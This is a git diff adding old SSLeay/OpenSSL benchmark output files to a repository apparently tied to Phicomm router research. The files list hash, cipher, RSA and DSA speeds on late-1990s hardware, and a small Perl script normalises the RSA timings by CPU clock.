@@ -0,0 +1,32 @@
+SSLeay 0.9.0 08-Apr-1998
+built on Wed Apr  8 12:47:17 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(
+ptr2)
+C flags:cl /MD /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DL_ENDIAN
+-DBN_ASM -DMD5_ASM -DSHA1_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 92.25k      256.80k      347.01k      380.40k      390.31k
+mdc2               240.72k      251.10k      252.00k      250.80k      251.40k
+md5               1013.61k     5651.94k    11831.61k    16294.89k    17901.43k
+hmac(md5)          419.50k     2828.07k     7770.11k    13824.34k    17091.70k
+sha1               524.31k     2721.45k     5216.15k     6766.10k     7308.42k
+rmd160             462.09k     2288.59k     4260.77k     5446.44k     5841.65k
+rc4               7895.90k    10326.73k    10555.43k    10728.22k    10429.44k
+des cbc           2036.86k     2208.92k     2237.68k     2237.20k     2181.35k
+des ede3           649.92k      739.42k      749.07k      748.86k      738.27k
+idea cbc           823.19k      885.10k      894.92k      896.45k      891.87k
+rc2 cbc            792.63k      859.00k      867.45k      868.96k      865.30k
+rc5-32/12 cbc     3502.26k     4026.79k     4107.23k     4121.76k     4073.72k
+blowfish cbc      3752.96k     4026.79k     4075.31k     3965.87k     3892.26k
+cast cbc          2566.27k     2807.43k     2821.79k     2792.48k     2719.34k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0179s   0.0020s     56.0    501.7
+rsa 1024 bits   0.0950s   0.0060s     10.5    166.6
+rsa 2048 bits   0.6299s   0.0209s      1.6     47.8
+rsa 4096 bits   4.5870s   0.0787s      0.2     12.7
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0180s   0.0339s     55.6     29.5
+dsa 1024 bits   0.0555s   0.1076s     18.0      9.3
+dsa 2048 bits   0.1971s   0.3918s      5.1      2.6
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/486-50.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/486-50.nt
new file mode 100644
index 0000000..84820d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/486-50.nt
@@ -0,0 +1,30 @@
+486-50 NT 4.0
+
+SSLeay 0.9.1a 06-Jul-1998
+built on Sat Jul 18 18:03:20 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(ptr2)
+C flags:cl /MD /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DBN_ASM -DMD5_ASM -DSHA1_ASM -DRMD160_ASM /Fdout32
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 28.77k       80.30k      108.50k      118.98k      122.47k
+mdc2                51.52k       54.06k       54.54k       54.65k       54.62k
+md5                304.39k     1565.04k     3061.54k     3996.10k     4240.10k
+hmac(md5)          119.53k      793.23k     2061.29k     3454.95k     4121.76k
+sha1               127.51k      596.93k     1055.54k     1313.84k     1413.18k
+rmd160             128.50k      572.49k     1001.03k     1248.01k     1323.63k
+rc4               1224.40k     1545.11k     1590.29k     1600.20k     1576.90k
+des cbc            448.19k      503.45k      512.30k      513.30k      508.23k
+des ede3           148.66k      162.48k      163.68k      163.94k      164.24k
+idea cbc           194.18k      211.10k      212.99k      213.18k      212.64k
+rc2 cbc            245.78k      271.01k      274.12k      274.38k      273.52k
+rc5-32/12 cbc     1252.48k     1625.20k     1700.03k     1711.12k     1677.18k
+blowfish cbc       725.16k      828.26k      850.01k      846.99k      833.79k
+cast cbc           643.30k      717.22k      739.48k      741.57k      735.33k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0904s   0.0104s     11.1     96.2
+rsa 1024 bits   0.5968s   0.0352s      1.7     28.4
+rsa 2048 bits   3.8860s   0.1017s      0.3      9.8
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.1006s   0.1249s      9.9      8.0
+dsa 1024 bits   0.3306s   0.4093s      3.0      2.4
+dsa 2048 bits   0.9454s   1.1707s      1.1      0.9
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/586-100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/586-100.lnx
new file mode 100644
index 0000000..3dbdcfd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/586-100.lnx
@@ -0,0 +1,32 @@
+Pentium 100mhz, linux
+
+SSLeay 0.9.0a 14-Apr-1998
+built on Fri Apr 17 08:47:07 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DSHA1_ASM -DMD5_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 56.65k      153.88k      208.47k      229.03k      237.57k
+mdc2               189.59k      204.95k      206.93k      208.90k      209.56k
+md5               1019.48k     5882.41k    12085.42k    16376.49k    18295.47k
+hmac(md5)          415.86k     2887.85k     7891.29k    13894.66k    17446.23k
+sha1               540.68k     2791.96k     5289.30k     6813.01k     7432.87k
+rmd160             298.37k     1846.87k     3869.10k     5273.94k     5892.78k
+rc4               7870.87k    10438.10k    10857.13k    10729.47k    10788.86k
+des cbc           1960.60k     2226.37k     2241.88k     2054.83k     2181.80k
+des ede3           734.44k      739.69k      779.43k      750.25k      772.78k
+idea cbc           654.07k      711.00k      716.89k      718.51k      720.90k
+rc2 cbc            648.83k      701.91k      708.61k      708.95k      709.97k
+rc5-32/12 cbc     3504.71k     4054.76k     4131.41k     4105.56k     4134.23k
+blowfish cbc      3762.25k     4313.79k     4460.54k     4356.78k     4317.18k
+cast cbc          2755.01k     3038.91k     3076.44k     3027.63k     2998.27k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0195s   0.0019s     51.4    519.9
+rsa 1024 bits   0.1000s   0.0059s     10.0    168.2
+rsa 2048 bits   0.6406s   0.0209s      1.6     47.8
+rsa 4096 bits   4.6100s   0.0787s      0.2     12.7
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0188s   0.0360s     53.1     27.8
+dsa 1024 bits   0.0570s   0.1126s     17.5      8.9
+dsa 2048 bits   0.1990s   0.3954s      5.0      2.5
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/68000.bsd b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/68000.bsd
new file mode 100644
index 0000000..a3a14e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/68000.bsd
@@ -0,0 +1,32 @@
+Motorolla 68020 20mhz, NetBSD
+
+SSLeay 0.9.0t 29-May-1998
+built on Fri Jun  5 12:42:23 EST 1998
+options:bn(64,32) md2(char) rc4(idx,int) des(idx,cisc,16,long) idea(int) blowfish(idx) 
+C flags:gcc -DTERMIOS -O3 -fomit-frame-pointer -Wall -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               2176.00      5994.67      8079.73      8845.18      9077.01 
+mdc2              5730.67      6122.67      6167.66      6176.51      6174.87 
+md5                 29.10k      127.31k      209.66k      250.50k      263.99k
+hmac(md5)           12.33k       73.02k      160.17k      228.04k      261.15k
+sha1                11.27k       49.37k       84.31k      102.40k      109.23k
+rmd160              11.69k       48.62k       78.76k       93.15k       98.41k
+rc4                117.96k      148.94k      152.57k      153.09k      152.92k
+des cbc             27.13k       30.06k       30.38k       30.38k       30.53k
+des ede3            10.51k       10.94k       11.01k       11.01k       11.01k
+idea cbc            26.74k       29.23k       29.45k       29.60k       29.74k
+rc2 cbc             34.27k       39.39k       40.03k       40.07k       40.16k
+rc5-32/12 cbc       64.31k       83.18k       85.70k       86.70k       87.09k
+blowfish cbc        48.86k       59.18k       60.07k       60.42k       60.78k
+cast cbc            42.67k       50.01k       50.86k       51.20k       51.37k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.7738s   0.0774s      1.3     12.9
+rsa 1024 bits   4.3967s   0.2615s      0.2      3.8
+rsa 2048 bits  29.5200s   0.9664s      0.0      1.0
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.7862s   0.9709s      1.3      1.0
+dsa 1024 bits   2.5375s   3.1625s      0.4      0.3
+dsa 2048 bits   9.2150s  11.8200s      0.1      0.1
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/686-200.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/686-200.lnx
new file mode 100644
index 0000000..2981181
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/686-200.lnx
@@ -0,0 +1,32 @@
+Pentium Pro 200mhz, linux
+
+SSLeay 0.9.0d 26-Apr-1998
+built on Sun Apr 26 10:25:33 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DSHA1_ASM -DMD5_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                130.58k      364.54k      499.24k      545.79k      561.66k
+mdc2               526.68k      579.72k      588.37k      588.80k      589.82k
+md5               1917.71k    11434.69k    22512.21k    29495.30k    32677.89k
+hmac(md5)          749.18k     5264.83k    14227.20k    25018.71k    31760.38k
+sha1              1343.83k     6436.29k    11702.78k    14664.70k    15829.67k
+rmd160            1038.05k     5138.77k     8985.51k    10985.13k    11799.21k
+rc4              14891.04k    21334.06k    22376.79k    22579.54k    22574.42k
+des cbc           4131.97k     4568.31k     4645.29k     4631.21k     4572.73k
+des ede3          1567.17k     1631.13k     1657.32k     1653.08k     1643.86k
+idea cbc          2427.23k     2671.21k     2716.67k     2723.84k     2733.40k
+rc2 cbc           1629.90k     1767.38k     1788.50k     1797.12k     1799.51k
+rc5-32/12 cbc    10290.55k    13161.60k    13744.55k    14011.73k    14123.01k
+blowfish cbc      5896.42k     6920.77k     7122.01k     7151.62k     7146.15k
+cast cbc          6037.71k     6935.19k     7101.35k     7145.81k     7116.12k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0070s   0.0007s    142.6   1502.9
+rsa 1024 bits   0.0340s   0.0019s     29.4    513.3
+rsa 2048 bits   0.2087s   0.0066s      4.8    151.3
+rsa 4096 bits   1.4700s   0.0242s      0.7     41.2
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0064s   0.0121s    156.1     82.9
+dsa 1024 bits   0.0184s   0.0363s     54.4     27.5
+dsa 2048 bits   0.0629s   0.1250s     15.9      8.0
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha064.osf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha064.osf
new file mode 100644
index 0000000..a8e7fdf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha064.osf
@@ -0,0 +1,32 @@
+Alpha EV4.5 (21064) 275mhz, OSF1 V4.0
+SSLeay 0.9.0g 01-May-1998
+built on Mon May  4 17:26:09 CST 1998
+options:bn(64,64) md2(int) rc4(ptr,int) des(idx,cisc,4,long) idea(int) blowfish(idx) 
+C flags:cc -tune host -O4 -readonly_strings
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                119.58k      327.48k      443.28k      480.09k      495.16k
+mdc2               436.67k      456.35k      465.42k      466.57k      469.01k
+md5               1459.34k     6566.46k    11111.91k    13375.30k    14072.60k
+hmac(md5)          597.90k     3595.45k     8180.88k    12099.49k    13884.46k
+sha1               707.01k     3253.09k     6131.73k     7798.23k     8439.67k
+rmd160             618.57k     2729.07k     4711.33k     5825.16k     6119.23k
+rc4               8796.43k     9393.62k     9548.88k     9378.77k     9472.57k
+des cbc           2165.97k     2514.90k     2586.27k     2572.93k     2639.08k
+des ede3           945.44k     1004.03k     1005.96k     1017.33k     1020.85k
+idea cbc          1498.81k     1629.11k     1637.28k     1625.50k     1641.11k
+rc2 cbc           1866.00k     2044.92k     2067.12k     2064.00k     2068.96k
+rc5-32/12 cbc     4366.97k     5521.32k     5687.50k     5729.16k     5736.96k
+blowfish cbc      3997.31k     4790.60k     4937.84k     4954.56k     5024.85k
+cast cbc          2900.19k     3673.30k     3803.73k     3823.93k     3890.25k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0069s   0.0006s    144.2   1545.8
+rsa 1024 bits   0.0304s   0.0018s     32.9    552.6
+rsa 2048 bits   0.1887s   0.0062s      5.3    161.4
+rsa 4096 bits   1.3667s   0.0233s      0.7     42.9
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0067s   0.0123s    149.6     81.1
+dsa 1024 bits   0.0177s   0.0332s     56.6     30.1
+dsa 2048 bits   0.0590s   0.1162s     16.9      8.6
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.lnx
new file mode 100644
index 0000000..c994662
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.lnx
@@ -0,0 +1,32 @@
+Alpha EV5.6 (21164A) 533mhz, Linux 2.0.32
+
+SSLeay 0.9.0p 22-May-1998
+built on Sun May 27 14:23:38 GMT 2018
+options:bn(64,64) md2(int) rc4(ptr,int) des(idx,risc1,16,long) idea(int) blowfish(idx) 
+C flags:gcc -O3
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                295.78k      825.34k     1116.42k     1225.10k     1262.65k
+mdc2               918.16k     1017.55k     1032.18k     1034.24k     1035.60k
+md5               3574.93k    15517.05k    25482.67k    30434.31k    32210.51k
+hmac(md5)         1261.54k     7757.15k    18025.46k    27081.21k    31653.27k
+sha1              2251.89k    10056.84k    16990.19k    20651.04k    21973.29k
+rmd160            1615.49k     7017.13k    11601.11k    13875.62k    14690.31k
+rc4              22435.16k    24476.40k    24349.95k    23042.36k    24581.53k
+des cbc           5198.38k     6559.04k     6775.43k     6827.87k     6875.82k
+des ede3          2257.73k     2602.18k     2645.60k     2657.12k     2670.59k
+idea cbc          3694.42k     4125.61k     4180.74k     4193.28k     4192.94k
+rc2 cbc           4642.47k     5323.85k     5415.42k     5435.86k     5434.03k
+rc5-32/12 cbc     9705.26k    13277.79k    13843.46k    13989.66k    13987.57k
+blowfish cbc      7861.28k    10852.34k    11447.98k    11616.97k    11667.54k
+cast cbc          6718.13k     8599.98k     8967.17k     9070.81k     9099.28k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0018s   0.0002s    555.9   6299.5
+rsa 1024 bits   0.0081s   0.0005s    123.3   2208.7
+rsa 2048 bits   0.0489s   0.0015s     20.4    648.5
+rsa 4096 bits   0.3402s   0.0057s      2.9    174.7
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0019s   0.0032s    529.0    310.2
+dsa 1024 bits   0.0047s   0.0086s    214.1    115.7
+dsa 2048 bits   0.0150s   0.0289s     66.7     34.6
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.osf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.osf
new file mode 100644
index 0000000..df712c6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.osf
@@ -0,0 +1,31 @@
+Alpha EV5.6 (21164A) 400mhz, OSF1 V4.0
+
+SSLeay 0.9.0 10-Apr-1998
+built on Sun Apr 19 07:54:37 EST 1998
+options:bn(64,64) md2(int) rc4(ptr,int) des(ptr,risc2,4,int) idea(int) blowfish(idx) 
+C flags:cc -O4 -tune host -fast
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                276.30k      762.07k     1034.35k     1134.07k     1160.53k
+mdc2               814.99k      845.83k      849.09k      850.33k      849.24k
+md5               2468.43k    10945.27k    17963.48k    21430.89k    22544.38k
+hmac(md5)         1002.48k     6023.98k    13430.99k    19344.17k    22351.80k
+sha1              1984.93k     8882.47k    14856.47k    17878.70k    18955.10k
+rmd160            1286.96k     5595.52k     9167.00k    10957.74k    11582.30k
+rc4              15948.15k    16710.29k    16793.20k    17929.50k    18474.56k
+des cbc           3416.04k     4149.37k     4296.25k     4328.89k     4327.57k
+des ede3          1540.14k     1683.36k     1691.14k     1705.90k     1705.22k
+idea cbc          2795.87k     3192.93k     3238.13k     3238.17k     3256.66k
+rc2 cbc           3529.00k     4069.93k     4135.79k     4135.25k     4160.07k
+rc5-32/12 cbc     7212.35k     9849.71k    10260.91k    10423.38k    10439.99k
+blowfish cbc      6061.75k     8363.50k     8706.80k     8779.40k     8784.55k
+cast cbc          5401.75k     6433.31k     6638.18k     6662.40k     6702.80k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0022s   0.0002s    449.6   4916.2
+rsa 1024 bits   0.0105s   0.0006s     95.3   1661.2
+rsa 2048 bits   0.0637s   0.0020s     15.7    495.6
+rsa 4096 bits   0.4457s   0.0075s      2.2    132.7
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0028s   0.0048s    362.2    210.4
+dsa 1024 bits   0.0064s   0.0123s    155.2     81.6
+dsa 2048 bits   0.0201s   0.0394s     49.7     25.4
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/mips-rel.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/mips-rel.pl
new file mode 100644
index 0000000..4b25093
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/mips-rel.pl
@@ -0,0 +1,21 @@
+#!/usr/local/bin/perl
+
+&doit(100,"Pentium   100 32",0.0195,0.1000,0.6406,4.6100);	# pentium-100
+&doit(200,"PPro      200 32",0.0070,0.0340,0.2087,1.4700);	# pentium-100
+&doit( 25,"R3000      25 32",0.0860,0.4825,3.2417,23.8833);	# R3000-25
+&doit(200,"R4400     200 32",0.0137,0.0717,0.4730,3.4367);	# R4400 32bit
+&doit(180,"R10000    180 32",0.0061,0.0311,0.1955,1.3871);	# R10000 32bit
+&doit(180,"R10000    180 64",0.0034,0.0149,0.0880,0.5933);	# R10000 64bit
+&doit(400,"DEC 21164 400 64",0.0022,0.0105,0.0637,0.4457);	# R10000 64bit
+
+sub doit
+	{
+	local($mhz,$label,@data)=@_;
+
+	for ($i=0; $i <= $#data; $i++)
+		{
+		$data[$i]=1/$data[$i]*200/$mhz;
+		}
+	printf("%s %6.1f %6.1f %6.1f %6.1f\n",$label,@data);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r10000.irx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r10000.irx
new file mode 100644
index 0000000..237ee5d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r10000.irx
@@ -0,0 +1,37 @@
+MIPS R10000 32kI+32kD 180mhz, IRIX 6.4
+
+Using crypto/bn/mips3.s
+
+This is built for n32, which is faster for all benchmarks than the n64
+compilation model
+
+SSLeay 0.9.0b 19-Apr-1998
+built on Sat Apr 25 12:43:14 EST 1998
+options:bn(64,64) md2(int) rc4(ptr,int) des(ptr,risc2,16,long) idea(int) blowfish(ptr) 
+C flags:cc -use_readonly_const -O2 -DTERMIOS -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                126.38k      349.38k      472.67k      517.01k      529.81k
+mdc2               501.64k      545.87k      551.80k      553.64k      554.41k
+md5               1825.77k     7623.64k    12630.47k    15111.74k    16012.09k
+hmac(md5)          780.81k     4472.86k     9667.22k    13802.67k    15777.89k
+sha1              1375.52k     6213.91k    11037.30k    13682.01k    14714.09k
+rmd160             856.72k     3454.40k     5598.33k     6689.94k     7073.48k
+rc4              11260.93k    13311.50k    13360.05k    13322.17k    13364.39k
+des cbc           2770.78k     3055.42k     3095.18k     3092.48k     3103.03k
+des ede3          1023.22k     1060.58k     1063.81k     1070.37k     1064.54k
+idea cbc          3029.09k     3334.30k     3375.29k     3375.65k     3380.64k
+rc2 cbc           2307.45k     2470.72k     2501.25k     2500.68k     2500.55k
+rc5-32/12 cbc     6770.91k     8629.89k     8909.58k     9009.64k     9044.95k
+blowfish cbc      4796.53k     5598.20k     5717.14k     5755.11k     5749.86k
+cast cbc          3986.20k     4426.17k     4465.04k     4476.84k     4475.08k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0034s   0.0003s    296.1   3225.4
+rsa 1024 bits   0.0139s   0.0008s     71.8   1221.8
+rsa 2048 bits   0.0815s   0.0026s     12.3    380.3
+rsa 4096 bits   0.5656s   0.0096s      1.8    103.7
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0034s   0.0061s    290.8    164.9
+dsa 1024 bits   0.0084s   0.0161s    119.1     62.3
+dsa 2048 bits   0.0260s   0.0515s     38.5     19.4
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r3000.ult b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r3000.ult
new file mode 100644
index 0000000..ecd3390
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r3000.ult
@@ -0,0 +1,32 @@
+MIPS R3000 64kI+64kD 25mhz, ultrix 4.3
+
+SSLeay 0.9.0b 19-Apr-1998
+built on Thu Apr 23 07:22:31 EST 1998
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,risc2,16,long) idea(int) blowfish(idx) 
+C flags:cc -O2 -DL_ENDIAN -DNOPROTO -DNOCONST
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 14.63k       40.65k       54.70k       60.07k       61.78k
+mdc2                29.43k       37.27k       38.23k       38.57k       38.60k
+md5                140.04k      676.59k     1283.84k     1654.10k     1802.24k
+hmac(md5)           60.51k      378.90k      937.82k     1470.46k     1766.74k
+sha1                60.77k      296.79k      525.40k      649.90k      699.05k
+rmd160              48.82k      227.16k      417.19k      530.31k      572.05k
+rc4                904.76k      996.20k     1007.53k     1015.65k     1010.35k
+des cbc            178.87k      209.39k      213.42k      215.55k      214.53k
+des ede3            74.25k       79.30k       80.40k       80.21k       80.14k
+idea cbc           181.02k      209.37k      214.44k      214.36k      213.83k
+rc2 cbc            161.52k      184.98k      187.99k      188.76k      189.05k
+rc5-32/12 cbc      398.99k      582.91k      614.66k      626.07k      621.87k
+blowfish cbc       296.38k      387.69k      405.50k      412.57k      410.05k
+cast cbc           214.76k      260.63k      266.92k      268.63k      258.26k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0870s   0.0089s     11.5    112.4
+rsa 1024 bits   0.4881s   0.0295s      2.0     33.9
+rsa 2048 bits   3.2750s   0.1072s      0.3      9.3
+rsa 4096 bits  23.9833s   0.4093s      0.0      2.4
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0898s   0.1706s     11.1      5.9
+dsa 1024 bits   0.2847s   0.5565s      3.5      1.8
+dsa 2048 bits   1.0267s   2.0433s      1.0      0.5
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r4400.irx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r4400.irx
new file mode 100644
index 0000000..9b96ca1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r4400.irx
@@ -0,0 +1,32 @@
+R4400 16kI+16kD 200mhz, Irix 5.3
+
+SSLeay 0.9.0e 27-Apr-1998
+built on Sun Apr 26 07:26:05 PDT 1998
+options:bn(64,32) md2(int) rc4(ptr,int) des(ptr,risc2,16,long) idea(int) blowfish(ptr) 
+C flags:cc -O2 -use_readonly_const -DTERMIOS -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 79.80k      220.59k      298.01k      327.06k      338.60k
+mdc2               262.74k      285.30k      289.16k      288.36k      288.49k
+md5                930.35k     4167.13k     7167.91k     8678.23k     9235.86k
+hmac(md5)          399.44k     2367.57k     5370.74k     7884.28k     9076.98k
+sha1               550.96k     2488.17k     4342.76k     5362.50k     5745.40k
+rmd160             424.58k     1752.83k     2909.67k     3486.08k     3702.89k
+rc4               6687.79k     7834.63k     7962.61k     8035.65k     7915.28k
+des cbc           1544.20k     1725.94k     1748.35k     1758.17k     1745.61k
+des ede3           587.29k      637.75k      645.93k      643.17k      646.01k
+idea cbc          1575.52k     1719.75k     1732.41k     1736.69k     1740.11k
+rc2 cbc           1496.21k     1629.90k     1643.19k     1652.14k     1646.62k
+rc5-32/12 cbc     3452.48k     4276.47k     4390.74k     4405.25k     4400.12k
+blowfish cbc      2354.58k     3242.36k     3401.11k     3433.65k     3383.65k
+cast cbc          1942.22k     2152.28k     2187.51k     2185.67k     2177.20k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0130s   0.0014s     76.9    729.8
+rsa 1024 bits   0.0697s   0.0043s     14.4    233.9
+rsa 2048 bits   0.4664s   0.0156s      2.1     64.0
+rsa 4096 bits   3.4067s   0.0586s      0.3     17.1
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0140s   0.0261s     71.4     38.4
+dsa 1024 bits   0.0417s   0.0794s     24.0     12.6
+dsa 2048 bits   0.1478s   0.2929s      6.8      3.4
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.lnx
new file mode 100644
index 0000000..5e213ee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.lnx
@@ -0,0 +1,32 @@
+SSLeay 0.8.4c 03-Aug-1999
+built on Tue Nov  4 02:52:29 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DMD5_ASM -DSHA1_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                53.27k      155.95k      201.30k      216.41k      236.78k
+mdc2              192.98k      207.98k      206.76k      206.17k      208.87k
+md5               993.15k     5748.27k    11944.70k    16477.53k    18287.27k
+hmac(md5)         404.97k     2787.58k     7690.07k    13744.43k    17601.88k
+sha1              563.24k     2851.67k     5363.71k     6879.23k     7441.07k
+rc4              7876.70k    10400.85k    10825.90k    10943.49k    10745.17k
+des cbc          2047.39k     2188.25k     2188.29k     2239.49k     2233.69k
+des ede3          660.55k      764.01k      773.55k      779.21k      780.97k
+idea cbc          653.93k      708.48k      715.43k      719.87k      720.90k
+rc2 cbc           648.08k      702.23k      708.78k      711.00k      709.97k
+blowfish cbc     3764.39k     4288.66k     4375.04k     4497.07k     4423.68k
+cast cbc         2757.14k     2993.75k     3035.31k     3078.90k     3055.62k
+
+blowfish cbc     3258.81k     3673.47k     3767.30k     3774.12k     3719.17k
+cast cbc         2677.05k     3164.78k     3273.05k     3287.38k     3244.03k
+
+
+                  sign    verify
+rsa  512 bits   0.0213s   0.0020s
+rsa 1024 bits   0.1073s   0.0063s
+rsa 2048 bits   0.6873s   0.0224s
+rsa 4096 bits   4.9333s   0.0845s
+                  sign    verify
+dsa  512 bits   0.0201s   0.0385s
+dsa 1024 bits   0.0604s   0.1190s
+dsa 2048 bits   0.2121s   0.4229s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.nt
new file mode 100644
index 0000000..0dd7cfc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.nt
@@ -0,0 +1,29 @@
+SSLeay 0.8.4c 03-Aug-1999
+built on Tue Aug  3 09:49:58 EST 1999
+options:bn(64,32) md2(int) rc4(ptr,int) des(idx,cisc,4,long) idea(int) blowfish(
+ptr2)
+C flags:cl /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DL_ENDIAN -DBN
+_ASM -DMD5_ASM -DSHA1_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                93.07k      258.38k      349.03k      382.83k      392.87k
